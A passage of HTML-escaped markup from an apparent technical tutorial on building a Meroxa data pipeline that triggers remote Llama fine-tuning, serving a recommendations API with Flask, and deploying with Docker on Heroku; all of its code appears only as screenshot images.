    style=&quot;padding-bottom: 91.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC5UlEQVR42pVUS08TYRTtTzAuDLbQxzw67/nmVSvU5wawrT/AoBFajZRWjO7culI3ohsjmmgCBQE1ArFKFBOQv0WO9/umRXmYyOLM/eZ27plz77nTxFJna3f56/buYufX7vKXbXE+Lj5s7IjIuRIrGzt4+vwVmo06bkzdwth4DWMT/4/rtTqu3RzHkxezWPm2g8RSZxuN1n0UzVPIOSmk031IZ2JkDiCdOfxbNptEX98JTE4/wPvOFhLt1R+oN6chqVl4rgnX1eEyHU43ctiuBtfT4fkGmGfEOUcj5GFYKiRlALdb9zC/+h0JfqlNNqHpGYQFWxT6vhkX2XkiiIn8wKS8IWDZKnRDIsgCOSmF+tRdzH0mQn6pTbbgKDmEpg5mywiYQmrVbqG8B03vRQl5LSdwJOEEEZpSBkO2jcDLw3dleI4iFMZkCgwzJjNMZe8FpqWI+/2EqzGhJPUjdEwMmtQaRTd0wajtKNJRKFhErsGy4pdwIg7ewWHCbss86VHLlwoRwtBG8WyIqGiCRSoYkf/dZgwJav4fLdcaLchKPyxyruQzlM54RMgQkDomDCGzXK5QFQq5u1xdb8ZHKtS0LDlrwCN1zLdhkTFOQLP0bFLsUouqUKaRu1wtR8/pI2bYJIUDVGySChq2kRN7xnfRJNdNWxHzjPeT52OVPYOOVKjrWVw0HJwjlYNDLqKCj0LRJXMkeAWV7hnCiAkyl8BXqKd0H+F8V2E+n8FlL8B5KhosmURg0YxkUqIQgSrOjquIDhhTRc6geTq+BVnuR71xwBROeCEMUIpCUkLKWF7A8zT6Ugh8P4O4XR55znJoDIEDRc2QwumYsL22iYk7U/SRn4ZMuyjlUmIncxQ5st24d5Z4THZzSXo2hWTypPh8+f+CIHz46DFGr1YxUq1guFLGcPkKoRyjUj58rvw5j1SrGCVwjvYaES6sb+LdSgcv5z5h5nUbz2bnj4WZNwtU+xFviWNx/Sd+AxAcq3wAq8g5AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa custom javascript JSONL conversion processor code&quot;
        title=&quot;&quot;
        src=&quot;/static/d7b51cd2d1fb8993f689c57adc8e16bd/5a190/jsonl.png&quot;
        srcset=&quot;/static/d7b51cd2d1fb8993f689c57adc8e16bd/772e8/jsonl.png 200w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/e17e5/jsonl.png 400w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/5a190/jsonl.png 800w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/c1b63/jsonl.png 1200w,
/static/d7b51cd2d1fb8993f689c57adc8e16bd/b1001/jsonl.png 1380w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;2.2. Data Transformation Processor (&lt;code class=&quot;language-text&quot;&gt;transform_data.js&lt;/code&gt;)&lt;/h3&gt;
&lt;p&gt;This processor further cleans the data by converting all keys to lowercase.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/5b9830dfc3064a8a60b15b46d79778ad/c45c7/transform.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACZElEQVR42p1TWU8TURjtD8Fqt7mz3Nk7nS6UCjz5I9QXo/LGAwkPisFIqZpSccHYuJGwGVAIRSVWaiKayAPwiyY5fnNLWaKi9eFk7tw753znfPPdyNtP3/FuawerzR9Y+0zY+g+0doKNr7tY2fy2G3m98gETd6sYq1QweruM0fHucaN8P1jcaGH54/ZepPKwjkGLwS2cRUyJIpE4g0TyXxFFPN6DFIsFtfpsW3D83jQ0nUFicShqArJyBEVNHlsTju2H76qWau+rqaAy/QwLjdZ+5OZkFZwE02kOl+A4KlxXg2XJBAW2rYq9zrlNa8NkQlQ3GDhPCcE7U08wt94kwXIVqi6BGxI03gY3WNsBkTQi8PBclw7XTE5Qohg940hJ50LXJwVNjSqxJHhYlceoaijERLyQdBpCYVlJnhS0NBl5pqBXV5EhQd/T4GcdmJZ62MfQSUgWzg7cdZyeEBwjQZlIjCKWchkUMx76B/sIRfSdz2NgoBdeIQM7bYqeiQL0Mzruf+uQmio+cHMWvJyDbNaGk3WhOzoKhTT8fBqeb8M0FbieCcOzRK//LEgVuSahpHB4OkUv+egt+kgTWUSVYm2wI/w1ctY1cSGbQ6mQR/9AEfm8QeMjkyhDJkPOXAbPC0dJguPqNEKGiP+r4OQUDGq+pTLYqgxd5zSwMpgSPxjgU0DJmCIGPJiozbQFb1VqYuLjiZ6D69TT3dUjXjIZDcoPnmK+sbUfefRyEdeHR3D56hAuXbmGi10i5A0NjwT1+VUsrLf2InNrTbxYamBmdhmPX73pGiHv+VIjWN7cxtL7L3s/AS+Xan5hct0+AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa custom javascript data transformation processor code&quot;
        title=&quot;&quot;
        src=&quot;/static/5b9830dfc3064a8a60b15b46d79778ad/5a190/transform.png&quot;
        srcset=&quot;/static/5b9830dfc3064a8a60b15b46d79778ad/772e8/transform.png 200w,
/static/5b9830dfc3064a8a60b15b46d79778ad/e17e5/transform.png 400w,
/static/5b9830dfc3064a8a60b15b46d79778ad/5a190/transform.png 800w,
/static/5b9830dfc3064a8a60b15b46d79778ad/c1b63/transform.png 1200w,
/static/5b9830dfc3064a8a60b15b46d79778ad/c45c7/transform.png 1346w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;2.3. Training Trigger &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; Processor&lt;/h3&gt;
&lt;p&gt;This processor sends an HTTP POST request to your training server endpoint when new processed data is available.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/1f1661d3a1ee00abc5ffd546424a2d50/a2ef2/webhook.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 45.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABoElEQVR42p2RTU8TURSG+zNcSEVm2plp63x07tyv6QikUKMLE3Vn/DNSdwIxEQaFKClfSQVpJIAY3fBbTP0R2snrmZmFK5LGxZP35CTnyT3nVj5dXv8efL7KPgzPs93jS+Lif/hzdPYDw4vrn5WPJ18nL54/w/yyBFcCQgvIeHpUR4KJMHv89An2Tq/GlXTvZBInAl7gIAiacJxZmOYMDGM6TLOKO9VbGVcR3h2clsJIRmCRj+XeAnTsI5J13HNrsGyjwHZuxmmYMGvVLE400sHxr1IoGAldPHzUg0p8MGWh3bZoYI4GcuncjeRSw5zJdKJK4RYJGQ/BeYClBwnEfQs8dqFUEyFzIGV+inohrltTCNNBLmwjYi66PY1Qz6ITO4gJzm2EoQ3frxEmPC9fsXy17dwtNmg0aWXjdiY0L4XvD0eThe4i2sxDZ16DyRa4oDoJoHQIScdm3KNPaxW4fpOg9MrMe42WlXV7S9g+HI0r+1++T97sHKC/tomXr99iZTUl8pqgXFndQJ+yv5YWvFqnXC/zX72VbewOsT/6Nv4LvG1c2QKRGK4AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa http webhook processor yaml to trigger remote training&quot;
        title=&quot;&quot;
        src=&quot;/static/1f1661d3a1ee00abc5ffd546424a2d50/5a190/webhook.png&quot;
        srcset=&quot;/static/1f1661d3a1ee00abc5ffd546424a2d50/772e8/webhook.png 200w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/e17e5/webhook.png 400w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/5a190/webhook.png 800w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/c1b63/webhook.png 1200w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/29007/webhook.png 1600w,
/static/1f1661d3a1ee00abc5ffd546424a2d50/a2ef2/webhook.png 1970w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Here’s the completed &lt;code class=&quot;language-text&quot;&gt;pipeline.yaml&lt;/code&gt; file:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/a878e/complete-pipeline.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 187.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAmCAYAAADEO7urAAAACXBIWXMAAAsTAAALEwEAmpwYAAAD6ElEQVR42q1Wy3ITVxTUjxAsad73zluah54WmAUUVfxT7FQlxCYL/EgFEuywooqwS8rL/Fmnzx1JyBg9sLPompHmTk+f0+ece1sf/vkXV5+u8e7j37i8B67+uoZwtc4vP+DF8xmqaYmyJgZFg3qOwXYUdR/DyRAX7z+i9fL0LepBjn4Rw3X2YNsP4LoP4XoP4TjfwbK2o9t9AMdt4/jiHVo/vn6DNI8wnvArowxFGSKKbSSpC6UtLuySfDMctwM/cPDz2R9o/fT6LXxlk6zAdH+IMPa5qAObX3R4dXeAqPMDm4S/LwgdKgowGPZM6FHsckF3J7KvEL5BQEKlbUOWZj4UFQf87d5VoRCGoYuqSpGmvlF3D4VzwkgIxZQUeS/kfxY83+LCBp7fXX5I7ncKudePkOUaUdTkMJiTBUzB4regcXcToXZQUt3Bkylmj0aGVBZ9fuEOIVd1ZkpH3Fb8wJdh3TGHKQo6rUPXhHpvwpoqE7rs+Z3/h1DCFmOSxL8foXSKDh0Tbr+IWNza9LGUjkDI9Ya83iCU4RAlCiXrr9+PTfnIw13V3VZ42iiUYn70eEyFmsWtESc2vDv3snZNOEUWodA+Er2HjOZIQcsL8mwVWwkVCW0OV8dpI1Uuih6HRC5z0WM+3WUZ+ab9rN0ITWewXByvjTqLUTGn0tfSNUK4KKVFT68qXU8oC7gwTRWJQuO23EtJLQhNT6tG7U6Eii/FYRNmzOkdEXESkNRj6djzQWHtptChiiLw8aSuMN6vkWUBlQbIc2UGb8y9RoeW6fXVXK43hQ9jmtKLQ77M4lbdBrpLdQLLEH7Z62tazzMjrF9GRlWgusux5cxHWIP2ElsJx2Nu9FmIJKIxLGyfyRflrtf+tsJehswHie9ikGhU7OuyztlBETQ/tmmP2eiyx9wMihyjUYlaMCyQFykj8BGm2jxfDXdt67nzwtbcmEZxREKeWcqE6eg0hhh3ra8O340hi4JEecjj2ORVHA5D2zis1O2SWWuKFG/Nk0NVx2biSGc0bq4627nl8FpC+bJsUrNZhWqYIy1io8522t+66zFk5qXLY1mvSPD02QHGswkG4z4HhM+c2QzdNq32uRa3bAE69EwOe5zYjw8mmEwrmhKx0BW3BYXhMOCVczJxTS7N1rA8BMwHhnZunhw6PDSKg3L4lJGV57ZBFMmJQSZNmynoGJg8epKKvaY65EqlL4Xw5NcrHmkL7isc/VWO6WyM4bhGReLpfs77Ps2q2JIpItZhnIY3kclVo1fm+OW392jJgf344hJHry5weHKG749PzfXw5ByHx2fm/uiV4Bw/EEdrIMfhPz9d4z9gb/sMkY/d0wAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa complete pipeline yaml file&quot;
        title=&quot;&quot;
        src=&quot;/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/5a190/complete-pipeline.png&quot;
        srcset=&quot;/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/772e8/complete-pipeline.png 200w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/e17e5/complete-pipeline.png 400w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/5a190/complete-pipeline.png 800w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/c1b63/complete-pipeline.png 1200w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/29007/complete-pipeline.png 1600w,
/static/0e9f92cc0ff38bea4f02ffafb0a9bafb/a878e/complete-pipeline.png 2048w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Step 3. Remote Fine-Tuning on a Training Server&lt;/h2&gt;
&lt;p&gt;When the Meroxa pipeline triggers your training server, it should load the processed JSONL data directly from S3 and begin fine-tuning the Llama model using Hugging Face’s Trainer API.&lt;/p&gt;
&lt;h3&gt;Remote Training Server Code&lt;/h3&gt;
&lt;p&gt;Below is a Flask app that exposes a &lt;code class=&quot;language-text&quot;&gt;/trigger-training&lt;/code&gt; endpoint. Upon receiving a POST request, it loads the dataset from S3 (using s3fs support via the datasets library), tokenizes the data, and starts fine-tuning.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3b6c0fccc0fc883431c6df525a553d61/a878e/training.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 129%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAYAAAC3g3x9AAAACXBIWXMAAAsTAAALEwEAmpwYAAADjUlEQVR42qVVXW/cRBTdH0Ih8dd4/G2Px/bueptN0pLHqn+pfW2BVkWItogqpaggRCQkKuAJftnh3PEm1WaTEtSHo5n1es7ce+4917Of3/2N01//wKtffv8oCMdP7/7B7PmbM9y/dxfD2mJY9BiWHfrF/0EPO7RYH6/x8u1vmH314geYKoWO9xGrfURqD0H4GYLgUwc/uAXPvwX/Etwz/h/yXc/7BEka4el3P2L2xfNTrJoGc1uhr3O0ZYq2LdAPNWxXoawSFKVGXsSERppFDlmuoJMAKvYRRfvIywRPXr4h4benOOg7rMceB0dLrHqDg1WP+cKgrlPUTYbWFpt9ioprY3IYXirEKvZIuLdN2JNEXpaXqiZh+AFv97mGhO8OKUoyYdqHJIkoUax9t98mNBUWvcJySDDOM5KGTDUmUiJyF0TK25DtYivCL0lYUrvGlui6jNFmMF3EaKlZHjG9wgkuByXqXUJ/l7Dmoa6vnDbDvCEMSTXMEKAdFP9LeJlmcRSyLHQRpyIHiyKyaO2RUL9PWQgbin8uuKxZESArPSJAWVKCMnJpi2YSlVR42l9OmW1TVBkJNcalECu2jULfJQ4SmbUxpdAO8rvj86KIJkLtX61hUWk07dQaRR2gbgPqqGCMZtuksNTWcpVIszxw1T+PeKfKFQkNG9ewstYkJNKoTOIOTa2jqFnkihMnIYl81zJXF4Upl0zZZApjm2MxlEy9xbjqHLFo2rIDGh4QB9mGDc0L3vekv9vYVZOzkjW6oXF267m2He03r7FcWj6v3bNhMCTMGQAvSmPE8ZVFee2KYhjJSPtZEo0j7XdgKYW+cMQF/rMPSZgXifPq3ZM1Dg9XWM47pjqJf507PkzIHxWnytGdFY6Ob2O1WpCwZBNPEbq0lHeN/a4qSp3RBawyi9IYafDETZncjaipic8Hxo0iLMrJIevDJRYsgowl0UsIUlptIvUvnHGjlGWQfn5yiJOTI7ce37nN1umdMxoTX0N2zXCQlNM8dGnnhdpM5HiylTrXb++mReFwoFNsSWv1MonTzUThBCkCZ7Vc7JYl7Ltp5G8jYOEufQJq9qGViW1zNxDqOkRFXYtcczSJlp4jk4NS9W3su49VSqc5QvlSzcc5vcsKt6UbqLXsTc1qV5Qh2yB1Ft0B5ZLoevbus+/fYnZ69iceffMKDx9/jQePJjx067Np//hmEI7XZ3/hX305iG3YKLgjAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Remote training python flask code&quot;
        title=&quot;&quot;
        src=&quot;/static/3b6c0fccc0fc883431c6df525a553d61/5a190/training.png&quot;
        srcset=&quot;/static/3b6c0fccc0fc883431c6df525a553d61/772e8/training.png 200w,
/static/3b6c0fccc0fc883431c6df525a553d61/e17e5/training.png 400w,
/static/3b6c0fccc0fc883431c6df525a553d61/5a190/training.png 800w,
/static/3b6c0fccc0fc883431c6df525a553d61/c1b63/training.png 1200w,
/static/3b6c0fccc0fc883431c6df525a553d61/29007/training.png 1600w,
/static/3b6c0fccc0fc883431c6df525a553d61/a878e/training.png 2048w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Step 4. Building and Deploying the Recommendations API&lt;/h2&gt;
&lt;p&gt;After fine-tuning, you’ll serve your model via an API. The following Flask application defines a &lt;code class=&quot;language-text&quot;&gt;/recommend&lt;/code&gt; endpoint that accepts a query and returns recommendations generated by your fine-tuned Llama model.&lt;/p&gt;
&lt;h3&gt;Recommendations API Code&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/823be3db47933f88ff1c9e759c715c47/8963a/api.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 93%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAAC0klEQVR42p1UyW4TQRT0f7Ak9kzPvs/0LF7xEon9iMQXEcMBSAIIJyCRwAEUQFyQIk58WVHdxlFiBYI4lF637Kmu11X9Wp++/8Th1x949/mE9f/x/tsPfCRX6+XhMR4+uI/ZnTFG0zFuzIjpGmZ/wdYEw8kIt+7dxaujY7Qev3iDPHbguBsQxnUI8zpMawOmYDWXaHeuaHSMqxqGce0U+vf2FXi+hScv36K1vbePMolQFjGaLIJMAkgZo9stUNUpyjJBxAPjxEMY2QgCC65nUoChodaW3UaU+JjvHpBwdx9VkULmEeqeREnS0BGIUx8JoYhUzfIQQWiTpAPb6ZBkWRWpsDYRxh7me78JyzpHlikCl3B4mo0osuB5SsESnm+ewvcFq9CE9jrho53XmG6NMBw16A9qTKddjCclmpGFrO6gGYaYTAdoeAVnW1W4UOGcCvM0ojKDd+cSHtt0kMsQeeEgzRytRpFpRWu4sGWZxhj3E2xNazQDGtQIHuDBcZYqhNWG4MXbTvtywjldDmIXkWWil6XIqCzN6Gho8h5NxLFYIlEO+6et/pmQCtVGGZLRTSkTtuuhagJGJkYhWasEsgx5iP0PCkkYcVPxo16/1NlLJZVlKm/iNGvK6VVkLmn5AH64DO50NiRpjS7zGDOoq6yp4K7W/0zoBwI3b88wGfZQy4yq/XMBXkGTn1nrum6KH7oI+KwGgwZpEsJ1hQ6s63Xg+saZtk0dIc/l2jGWa/X0zsdmwfvLMawK9JpCG9B0Y/QZo7wyUXcTHfhuX/J/BU1KkbCjiM8zpYkR15YgoXrLmnBngTRW7gYoCiJXbpscBBbiMIRtq9Y2NQQ/NDhdDHFNTyPDVHVDTx0vsKEMbj1dHHKejSGprqYhVbeiqpKDoiYa7kvImkOjUSgvQAVJ5WpuPlscoXXEafv84AO2OXqU2u2d/d9YrO3/An6rOA6/nOAXuvKkuHfulUwAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Recommendations API python flask code&quot;
        title=&quot;&quot;
        src=&quot;/static/823be3db47933f88ff1c9e759c715c47/5a190/api.png&quot;
        srcset=&quot;/static/823be3db47933f88ff1c9e759c715c47/772e8/api.png 200w,
/static/823be3db47933f88ff1c9e759c715c47/e17e5/api.png 400w,
/static/823be3db47933f88ff1c9e759c715c47/5a190/api.png 800w,
/static/823be3db47933f88ff1c9e759c715c47/c1b63/api.png 1200w,
/static/823be3db47933f88ff1c9e759c715c47/29007/api.png 1600w,
/static/823be3db47933f88ff1c9e759c715c47/8963a/api.png 1918w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Step 5. Deployment with Docker and Heroku&lt;/h2&gt;
&lt;p&gt;We’ll now containerize both the training server and the recommendations API and deploy them on Heroku as separate applications with its own Docker image. This approach keeps the deployments isolated and simplifies scaling and monitoring.&lt;/p&gt;
&lt;h3&gt;Prepare Your Codebase&lt;/h3&gt;
&lt;p&gt;Assume your project repository has two subdirectories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;training/&lt;/code&gt; – contains &lt;code class=&quot;language-text&quot;&gt;training_server.py&lt;/code&gt; and its &lt;code class=&quot;language-text&quot;&gt;Dockerfile&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;recommendations/&lt;/code&gt; – contains &lt;code class=&quot;language-text&quot;&gt;app.py&lt;/code&gt; (for the recommendations API) and its &lt;code class=&quot;language-text&quot;&gt;Dockerfile&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each subdirectory has its own &lt;code class=&quot;language-text&quot;&gt;requirements.txt&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;Dockerfile&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;5.1. Create a &lt;code class=&quot;language-text&quot;&gt;requirements.txt&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;For both services, create a &lt;code class=&quot;language-text&quot;&gt;requirements.txt&lt;/code&gt; file:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 638px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/990f24ba76ea153eb1728283d547e6a6/41be6/req.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 93.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAADz0lEQVR42n2U21MTZxjG8yd0Or3gXLK75LBBrYKVgIUqQmsRyiEJFkv1poyjRcYLb2oPFw0zjiPMSEBOOQA5bTaEEEgIBwPxMP476fVe7NP3+zZ0wGovntnTt7/vfb73YErmX2vru2+h5l9zJXZeGcoV/1/ldapx1VMH76DuvimZCKKp+Tf0soj49iGimZeIZA4Mbe5/RMb36NZLxLOHUHJFfX2fB1UyEUhjO8W2CnxnihhK9ojgBUS2GPy0opkCgQ4JdMQdEYyeC3qSXCZ2CKjkjrQYi4yAk9Nz+On+OG7fe4g7YxMYGxvHz/cfnNYvDzA2PoG7Ew/pfgLeKR8LRmdgJfeqZCKbWji9x20M3BpBn1SPO1dE9PTUoeqGCNFcDUH4rySpDhUVn8A1MgIKSA/T/2S/ZCK6tprKI5jIwvXjKLpkK4Y6GtHZbYXULUOWG2B3GJJPqPGMjcA18Nwaxcr6jr6W2mWRlkzRzIEWVLNYiGxgcPgm6oRKiDaKTDJDJtntAmzHsgmwlmWXJXxeX4GB4WEsxTJ6KJmj8z0omShrml/ZwmxIxYDHgyZHNa63Sei9LOBqi4CvmgRcuSjAeV5Ag1WAxVqG2hmwEv0uN16sreuBxDYlbb9kChNwOZ7BTCCOPpcLDisBWyV86xTQ3izg2iWB33d+aTwzddAG3U4JDkslbgy6MLei6n4lw0qKgGkCxjYx44/xj2dt1ehqkdBFoKsEabtgAL4mNZ8TIJP1Mw4BX5yV6Awr0Ts4BF9Q0VlQa+m9vwm4py0R8HkZ2EyWvyPLLCIGajlvwDoososEPNdoWD+23HcSuLF7GtjLgI3VGGgXcd1pxjd0hj2tZlxrMfOzbG8yzpQBWVLq3wemGXBzz7AcIOCQYbnzkoTL9GNbk3F+7N5J1lsvGFFaTgKHCBhK6P5jy5FyUmgXnmVRqoVVtsBik7gaSMyezS7SVeTvbPQsOywwU4H3u92UlKTOKoUnhTpECyjblPok362m5jNIDXUErqFuqOUS35dYy9dUVX1KxzSIxUhaD6qsbKgOaWJoVOmYD6fw6A8vbo7e5tXPivx7l4fkPqV+t4eK+Qe+ZpjWPvr9LyyEN3TWbcSi1tsuUC/vgyXGF1LwbH4F3ul5/PnkOR5PTuFX77N/9Zj02+Q0/+adfsHXztI/S9G0ziYRsWjaZGna0KRhUS5S+7ECn1pYxdPZAJ7MLJe1VBbd+/x4Ohfka3zBOG/ZUHJHZ+Msni3SPMwVNTZ62MBcpQZnfc2StBjdICupD4p9W45v8rXsH8qDrub55C79A5SEenX+1ea7AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Requirements for the Python code&quot;
        title=&quot;&quot;
        src=&quot;/static/990f24ba76ea153eb1728283d547e6a6/41be6/req.png&quot;
        srcset=&quot;/static/990f24ba76ea153eb1728283d547e6a6/772e8/req.png 200w,
/static/990f24ba76ea153eb1728283d547e6a6/e17e5/req.png 400w,
/static/990f24ba76ea153eb1728283d547e6a6/41be6/req.png 638w&quot;
        sizes=&quot;(max-width: 638px) 100vw, 638px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;5.2. Create a Dockerfile for the &lt;strong&gt;Recommendations API&lt;/strong&gt; (&lt;code class=&quot;language-text&quot;&gt;recommendations/Dockerfile&lt;/code&gt;):&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ad75afbe97b62e9c991518495c6436f1/ee3fb/rec-docker.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
